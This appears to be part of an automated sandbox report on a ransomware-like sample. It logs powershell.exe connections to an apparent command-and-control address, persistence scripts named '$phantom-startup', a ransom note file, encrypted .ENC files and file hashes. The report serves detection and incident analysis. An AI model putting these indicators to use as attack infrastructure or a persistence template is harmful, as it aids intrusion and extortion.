                                                                                                                                                    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=4be99d259d484e0bbabd7c0ae631006d&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=

                                                                                                                                                    HTTP Response

                                                                                                                                                    204

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4be99d259d484e0bbabd7c0ae631006d&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=

                                                                                                                                                    HTTP Response

                                                                                                                                                    204
                                                                                                                                                  • 193.161.193.99:25993
                                                                                                                                                    powershell.exe
                                                                                                                                                    38.7kB
                                                                                                                                                    1.9MB
                                                                                                                                                    783
                                                                                                                                                    1436
                                                                                                                                                  • 193.161.193.99:25993
                                                                                                                                                    powershell.exe
                                                                                                                                                    105.1kB
                                                                                                                                                    2.7kB
                                                                                                                                                    88
                                                                                                                                                    49
                                                                                                                                                  • 193.161.193.99:25993
                                                                                                                                                    powershell.exe
                                                                                                                                                    1.4kB
                                                                                                                                                    337 B
                                                                                                                                                    9
                                                                                                                                                    6
                                                                                                                                                  • 193.161.193.99:25993
                                                                                                                                                    powershell.exe
                                                                                                                                                    44.0kB
                                                                                                                                                    1.2kB
                                                                                                                                                    39
                                                                                                                                                    19
                                                                                                                                                  • 150.171.28.10:443
                                                                                                                                                    tse1.mm.bing.net
                                                                                                                                                    tls, http2
                                                                                                                                                    BackgroundTransferHost.exe
                                                                                                                                                    1.2kB
                                                                                                                                                    6.9kB
                                                                                                                                                    15
                                                                                                                                                    13
                                                                                                                                                  • 150.171.28.10:443
                                                                                                                                                    https://tse1.mm.bing.net/th?id=OADD2.10239317301700_18ZUY5V0A74HOX1SZ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                                                                                                                                    tls, http2
                                                                                                                                                    BackgroundTransferHost.exe
                                                                                                                                                    141.2kB
                                                                                                                                                    4.1MB
                                                                                                                                                    2981
                                                                                                                                                    2974

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239398629741_1IOH1H6D1NJ8OMST7&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418580_1XZDKNXCHEXKE96NH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239398629742_1P7YH795LJPRHWP9N&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                                                                                                                                                    HTTP Response

                                                                                                                                                    200

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418579_1UMXSJ3YHHNUEPPRM&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                                                                                                                                                    HTTP Response

                                                                                                                                                    200

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301291_1H8FN9XYY8JWTIM5Q&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                                                                                                                                                    HTTP Response

                                                                                                                                                    200

                                                                                                                                                    HTTP Response

                                                                                                                                                    200

                                                                                                                                                    HTTP Response

                                                                                                                                                    200

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301700_18ZUY5V0A74HOX1SZ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                                                                                                                                                    HTTP Response

                                                                                                                                                    200
                                                                                                                                                  • 150.171.28.10:443
                                                                                                                                                    tse1.mm.bing.net
                                                                                                                                                    tls, http2
                                                                                                                                                    BackgroundTransferHost.exe
                                                                                                                                                    1.2kB
                                                                                                                                                    6.9kB
                                                                                                                                                    15
                                                                                                                                                    12
                                                                                                                                                  • 193.161.193.99:25993
                                                                                                                                                    powershell.exe
                                                                                                                                                    2.2kB
                                                                                                                                                    132 B
                                                                                                                                                    5
                                                                                                                                                    3
                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    8.8.8.8.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    66 B
                                                                                                                                                    90 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    8.8.8.8.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    133.211.185.52.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    73 B
                                                                                                                                                    147 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    133.211.185.52.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    172.214.232.199.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    74 B
                                                                                                                                                    128 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    172.214.232.199.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    68.159.190.20.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    72 B
                                                                                                                                                    158 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    68.159.190.20.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    95.221.229.192.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    73 B
                                                                                                                                                    144 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    95.221.229.192.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    g.bing.com
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    56 B
                                                                                                                                                    148 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    g.bing.com

                                                                                                                                                    DNS Response

                                                                                                                                                    150.171.28.10
                                                                                                                                                    150.171.27.10

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    154.239.44.20.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    72 B
                                                                                                                                                    158 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    154.239.44.20.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    99.193.161.193.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    73 B
                                                                                                                                                    131 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    99.193.161.193.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    53.210.109.20.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    72 B
                                                                                                                                                    158 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    53.210.109.20.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    206.23.85.13.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    71 B
                                                                                                                                                    145 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    206.23.85.13.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    240.221.184.93.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    73 B
                                                                                                                                                    144 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    240.221.184.93.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    69.190.18.2.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    70 B
                                                                                                                                                    133 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    69.190.18.2.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    0.205.248.87.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    71 B
                                                                                                                                                    116 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    0.205.248.87.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    31.243.111.52.in-addr.arpa
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    72 B
                                                                                                                                                    158 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    31.243.111.52.in-addr.arpa

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    tse1.mm.bing.net
                                                                                                                                                    dns
                                                                                                                                                    Dnscache
                                                                                                                                                    62 B
                                                                                                                                                    170 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    tse1.mm.bing.net

                                                                                                                                                    DNS Response

                                                                                                                                                    150.171.28.10
                                                                                                                                                    150.171.27.10

                                                                                                                                                  • 224.0.0.251:5353
                                                                                                                                                    Dnscache
                                                                                                                                                    449 B
                                                                                                                                                    7

                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System User.log

                                                                                                                                                    Filesize

                                                                                                                                                    3KB

                                                                                                                                                    MD5

                                                                                                                                                    3f01549ee3e4c18244797530b588dad9

                                                                                                                                                    SHA1

                                                                                                                                                    3e87863fc06995fe4b741357c68931221d6cc0b9

                                                                                                                                                    SHA256

                                                                                                                                                    36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

                                                                                                                                                    SHA512

                                                                                                                                                    73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                    Filesize

                                                                                                                                                    3KB

                                                                                                                                                    MD5

                                                                                                                                                    661739d384d9dfd807a089721202900b

                                                                                                                                                    SHA1

                                                                                                                                                    5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                                                                    SHA256

                                                                                                                                                    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                                                                    SHA512

                                                                                                                                                    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                    Filesize

                                                                                                                                                    152B

                                                                                                                                                    MD5

                                                                                                                                                    ba6ef346187b40694d493da98d5da979

                                                                                                                                                    SHA1

                                                                                                                                                    643c15bec043f8673943885199bb06cd1652ee37

                                                                                                                                                    SHA256

                                                                                                                                                    d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

                                                                                                                                                    SHA512

                                                                                                                                                    2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                    Filesize

                                                                                                                                                    152B

                                                                                                                                                    MD5

                                                                                                                                                    b8880802fc2bb880a7a869faa01315b0

                                                                                                                                                    SHA1

                                                                                                                                                    51d1a3fa2c272f094515675d82150bfce08ee8d3

                                                                                                                                                    SHA256

                                                                                                                                                    467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

                                                                                                                                                    SHA512

                                                                                                                                                    e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                    Filesize

                                                                                                                                                    124KB

                                                                                                                                                    MD5

                                                                                                                                                    fb6835b8668f9f27c5f2bd63fcb64ec0

                                                                                                                                                    SHA1

                                                                                                                                                    97fc71b50e08fb8b99c4c1283798d84f54360586

                                                                                                                                                    SHA256

                                                                                                                                                    f08acf88d06090c06bfb643b7672812d115ae4124ad5dd6060bfe36036334667

                                                                                                                                                    SHA512

                                                                                                                                                    33be23ba64f6f8f2be6fa10e21c35177e848814c951403cac4d79f445f9b450aca6d8dbbc349951f20531a113a47f3016bda869684f6b8025c133ae6ee76e287

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                    Filesize

                                                                                                                                                    6KB

                                                                                                                                                    MD5

                                                                                                                                                    0a6bd5ed15343b8d560a8c9799c524b3

                                                                                                                                                    SHA1

                                                                                                                                                    7755ba6e36b8e04fe689d0494e733bd0cb32028e

                                                                                                                                                    SHA256

                                                                                                                                                    15452cdcd839f49589e0d2cfa45faf15d3c24c5735c30a889c60d9bbd9dccfec

                                                                                                                                                    SHA512

                                                                                                                                                    1909549c76b1bbcb99551069dfe6fe0097b6a9f430b71f246f4b098366aa7393261e17a0d5097f93c7f847d015b4a2d51f1a0269ad0e618a72b2a1f49cc4a7fc

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                    Filesize

                                                                                                                                                    5KB

                                                                                                                                                    MD5

                                                                                                                                                    50b08df28215df34e8b35f0b80a73f29

                                                                                                                                                    SHA1

                                                                                                                                                    7d623fc308552daad6de381f50c8b94a270b394d

                                                                                                                                                    SHA256

                                                                                                                                                    74bc1056a984b584b0ccc02b94d81490ba66910f3348a0b1b4164ed34af5d9f1

                                                                                                                                                    SHA512

                                                                                                                                                    d88d86f0de220c2cd85876db99db863dc91bf189acebae8cd05e8ab11ffe2e2b3940b7db87f59f8ba06170fa3261f699e8ab204767062711586c1a5ef2a4601e

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                    Filesize

                                                                                                                                                    6KB

                                                                                                                                                    MD5

                                                                                                                                                    6e8b725c428a473be6c8aeba490ab932

                                                                                                                                                    SHA1

                                                                                                                                                    ca96954548f0c7f22286a4511d25f81d273d2429

                                                                                                                                                    SHA256

                                                                                                                                                    d403f48b2966385e6603c77a63414d3dcc7f52db88d04c87f87c77321f97e9b0

                                                                                                                                                    SHA512

                                                                                                                                                    913501806564c4a872dc3596dc90d31231b4b902a9318426004ad5396ce9a074746b8fd5133edfa5a484cfcc08ebfbde770e717d8e1e8f158b706314d1667ae6

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                    Filesize

                                                                                                                                                    16B

                                                                                                                                                    MD5

                                                                                                                                                    206702161f94c5cd39fadd03f4014d98

                                                                                                                                                    SHA1

                                                                                                                                                    bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                                    SHA256

                                                                                                                                                    1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                                    SHA512

                                                                                                                                                    0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                    Filesize

                                                                                                                                                    16B

                                                                                                                                                    MD5

                                                                                                                                                    46295cac801e5d4857d09837238a6394

                                                                                                                                                    SHA1

                                                                                                                                                    44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                    SHA256

                                                                                                                                                    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                    SHA512

                                                                                                                                                    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                    Filesize

                                                                                                                                                    11KB

                                                                                                                                                    MD5

                                                                                                                                                    e8afda6167cd232ff3550c77877df321

                                                                                                                                                    SHA1

                                                                                                                                                    d90419b0d0d9e09f1f364c08a1224bdf643b386a

                                                                                                                                                    SHA256

                                                                                                                                                    f12e9518213d86c4533130498cc2fd6aa1ea439327d5d8300dc69779b2c6aa5b

                                                                                                                                                    SHA512

                                                                                                                                                    1b144a12d431ff21f380ef30d99e6bebad9fc559332c48a55363eb2f6f085a3a7361ee22dd9437c8998e41bf6f66bc3a85167e6f72525bcfb53c7e9db42ea477

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                    Filesize

                                                                                                                                                    11KB

                                                                                                                                                    MD5

                                                                                                                                                    06a2fad6aada48834af28793f2ce9a47

                                                                                                                                                    SHA1

                                                                                                                                                    4babc0bb589f28c42ce3e04da70b9cab3fadc35f

                                                                                                                                                    SHA256

                                                                                                                                                    db1d960dd96e8820024dcf42170ba3636704338c25d0e2f29faeb8e50e7fc13d

                                                                                                                                                    SHA512

                                                                                                                                                    3e115cb3aa7f2e170db7622e2917cec571a9c5b347cb21234a72992680b874fabd459009d9b8edb802777c081356aa285062a33cb18e28b2b23a20371f623489

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                    Filesize

                                                                                                                                                    53KB

                                                                                                                                                    MD5

                                                                                                                                                    a26df49623eff12a70a93f649776dab7

                                                                                                                                                    SHA1

                                                                                                                                                    efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                                                                    SHA256

                                                                                                                                                    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                                                                    SHA512

                                                                                                                                                    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    4f7360fa6f6e28cdc735fb5dd5686c19

                                                                                                                                                    SHA1

                                                                                                                                                    3f2ae8120074dbaf976979fd6df1bfe74da6f9c1

                                                                                                                                                    SHA256

                                                                                                                                                    b63b573ed02d466b2e3e6531029d47458d08932041083833b599c19d160523a3

                                                                                                                                                    SHA512

                                                                                                                                                    acdd55b01c852b333973dcc2634560a1b0f89f885ae096c435c6ec544c309c0d14e3a8436ba7baed84e969c5aa33dfb0811343d94d0a889b65d9059e8e75db71

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    005bc2ef5a9d890fb2297be6a36f01c2

                                                                                                                                                    SHA1

                                                                                                                                                    0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                                                                                                                    SHA256

                                                                                                                                                    342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                                                                                                                    SHA512

                                                                                                                                                    f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    552f4afe80153c765169c27d4cab4a05

                                                                                                                                                    SHA1

                                                                                                                                                    d67466e6c755bc77365cca0dca5a64df9fb0c5be

                                                                                                                                                    SHA256

                                                                                                                                                    d42e1beeb3f467e26b14acf6067b7e7863b811531d770fd821b52cf3190226d6

                                                                                                                                                    SHA512

                                                                                                                                                    a8a3a5df9c5d3d07774a3b0e70ae0d9fa64b82dc0cc3ead72872a9bb1810a7ec3982ef2ee19e1c45478fca52c2b3f5f71368ec30185fc05826ade3be9f27f394

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Filesize

                                                                                                                                                    1KB

                                                                                                                                                    MD5

                                                                                                                                                    71c4b1323b5c2b0b3dce79a418170c57

                                                                                                                                                    SHA1

                                                                                                                                                    f2484755165cc812bd2017c3ff93d7aef8e9f642

                                                                                                                                                    SHA256

                                                                                                                                                    b7151a59702581451ad3accb25d5aa7889a4d385142568331f42b0fcc2019872

                                                                                                                                                    SHA512

                                                                                                                                                    9048311d8ca08c33c090038fce1b5f28d22e1b9b0c1a6bb27f97619c778e2d474a3f10ab92c76bd487b94e059b5d066d1d960eec15b6a3a74355099494172e51

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Filesize

                                                                                                                                                    944B

                                                                                                                                                    MD5

                                                                                                                                                    6d42b6da621e8df5674e26b799c8e2aa

                                                                                                                                                    SHA1

                                                                                                                                                    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                                                                                    SHA256

                                                                                                                                                    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                                                                                    SHA512

                                                                                                                                                    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Filesize

                                                                                                                                                    944B

                                                                                                                                                    MD5

                                                                                                                                                    2b453e11296c30377ad61a79aaaa8028

                                                                                                                                                    SHA1

                                                                                                                                                    d24b574a09a27eafae2cb1f424152889c0626c50

                                                                                                                                                    SHA256

                                                                                                                                                    ecb67197af6883787011beb002c314c2cc8131bf324246e18bf9fc00a25cb29d

                                                                                                                                                    SHA512

                                                                                                                                                    5f6eb836692c95454f89b1f723a737a51554ca49dfd8e2b8b377a09bb36cb40c99b89f0d261e990a8a0a1011c816d22f25083b746a5030a2863cf9a8d87491fe

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Filesize

                                                                                                                                                    944B

                                                                                                                                                    MD5

                                                                                                                                                    fd98baf5a9c30d41317663898985593b

                                                                                                                                                    SHA1

                                                                                                                                                    ea300b99f723d2429d75a6c40e0838bf60f17aad

                                                                                                                                                    SHA256

                                                                                                                                                    9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

                                                                                                                                                    SHA512

                                                                                                                                                    bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\XBackground.bmp

                                                                                                                                                    Filesize

                                                                                                                                                    5.5MB

                                                                                                                                                    MD5

                                                                                                                                                    83f9fa37f0e2ecc9223615646e3c3b1d

                                                                                                                                                    SHA1

                                                                                                                                                    848c6810464f4b7db16315699fc3dfa7a568cd72

                                                                                                                                                    SHA256

                                                                                                                                                    14a63e47220e866f335843841bb7e192bfbaec8782914380d057325e62d792d5

                                                                                                                                                    SHA512

                                                                                                                                                    fb445175f763ef4dd7c224343cd71620cf580603871be4dbb56735b5d1d844efb2d666f618141b9caa087bf2e539aa1d6a0cd553da9cae9d9ee6bbcff72e2a0b

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vl2dchw0.bco.ps1

                                                                                                                                                    Filesize

                                                                                                                                                    60B

                                                                                                                                                    MD5

                                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                    SHA1

                                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                    SHA256

                                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                    SHA512

                                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_862.bat

                                                                                                                                                    Filesize

                                                                                                                                                    385KB

                                                                                                                                                    MD5

                                                                                                                                                    bd4af530d004a712f796171f4c748bd0

                                                                                                                                                    SHA1

                                                                                                                                                    22b50637859441a9024bef4c367f4ddb4bc12a9c

                                                                                                                                                    SHA256

                                                                                                                                                    57e2b4dc37fad695aaf7cd4841e37d66c7a84fe61eefbc1183261b628ac87dbf

                                                                                                                                                    SHA512

                                                                                                                                                    b7266ca4041ec8c1b9b59b0075d154c6100f8431903701522c51c31cfcece84ccec2623dad9a9a13b266e6d252f7393c27536994ef76c079f5f18bd9e66f126b

                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_862.vbs

                                                                                                                                                    Filesize

                                                                                                                                                    124B

                                                                                                                                                    MD5

                                                                                                                                                    5458c1cfdde022c81035962312b98059

                                                                                                                                                    SHA1

                                                                                                                                                    376a4070d28e7110cccca2eda1896b6a0e4439ae

                                                                                                                                                    SHA256

                                                                                                                                                    1804e0177b2f3c8ea020bb11ea797cd304667d4f28796ba6c062b14321bc783b

                                                                                                                                                    SHA512

                                                                                                                                                    a2eee230b379097dd995e84977123f230c7a74e1d71600c6d2f4a220ea5019f69a719a42b295a435e67129309b6f690e7edcd349c3cb4423ffec8846ec8d53ca

                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

                                                                                                                                                    Filesize

                                                                                                                                                    37KB

                                                                                                                                                    MD5

                                                                                                                                                    7aa16afbcbaaca9eb80f0f7fd0176782

                                                                                                                                                    SHA1

                                                                                                                                                    8968e66aea934c1d13804716b212de6591f7985d

                                                                                                                                                    SHA256

                                                                                                                                                    d54d277d886e25be05cf95099086c8cbad4ebc12382da5276d34250d1afa80d4

                                                                                                                                                    SHA512

                                                                                                                                                    181bcf655a37311f9d0f39544442f510b39f1920efc4f89cb631c3ab07cd376d4fd9797df194d570d93ae4a3592a91042d8b0c04a56f7aac7f5e3e1c3141818d

                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\System User

                                                                                                                                                    Filesize

                                                                                                                                                    442KB

                                                                                                                                                    MD5

                                                                                                                                                    04029e121a0cfa5991749937dd22a1d9

                                                                                                                                                    SHA1

                                                                                                                                                    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                                    SHA256

                                                                                                                                                    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                                    SHA512

                                                                                                                                                    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                                  • C:\Users\Admin\Desktop\How To Decrypt My Files.html

                                                                                                                                                    Filesize

                                                                                                                                                    668B

                                                                                                                                                    MD5

                                                                                                                                                    0cc5d134a76e73346c331b67cb32478c

                                                                                                                                                    SHA1

                                                                                                                                                    517541489c0050975cff96c860ceda0e71edd4b7

                                                                                                                                                    SHA256

                                                                                                                                                    18f3ebc8b2be00de35d2d345c3da673d1806422efed0dc8dfcd615887e65af34

                                                                                                                                                    SHA512

                                                                                                                                                    479962f7eee4f97b359b125cf5dcbfabc813804e73fc75622fa723df3260eaae866d848e05155a17086e3188583d83cb941c538082159fc09acacfb8dc5f7a81

                                                                                                                                                  • C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

                                                                                                                                                    Filesize

                                                                                                                                                    16B

                                                                                                                                                    MD5

                                                                                                                                                    c946da6b77ba427d748e5787c0be0916

                                                                                                                                                    SHA1

                                                                                                                                                    232165ec5a400a06d12aac6e52c5c4dba6045159

                                                                                                                                                    SHA256

                                                                                                                                                    ad3b8b319ca6044e0cd7cdd209b0d4c187fb48c45b682ce5e9b3ba933c37b9e5

                                                                                                                                                    SHA512

                                                                                                                                                    8419fec3ba06a6b74501451a31dc4c5d7a702341fd0d4a0a3eaa8c44ac95010dc7dcfa0e95af535547057500c0261ae3c3a93d9f23589351262ddb6179fad598

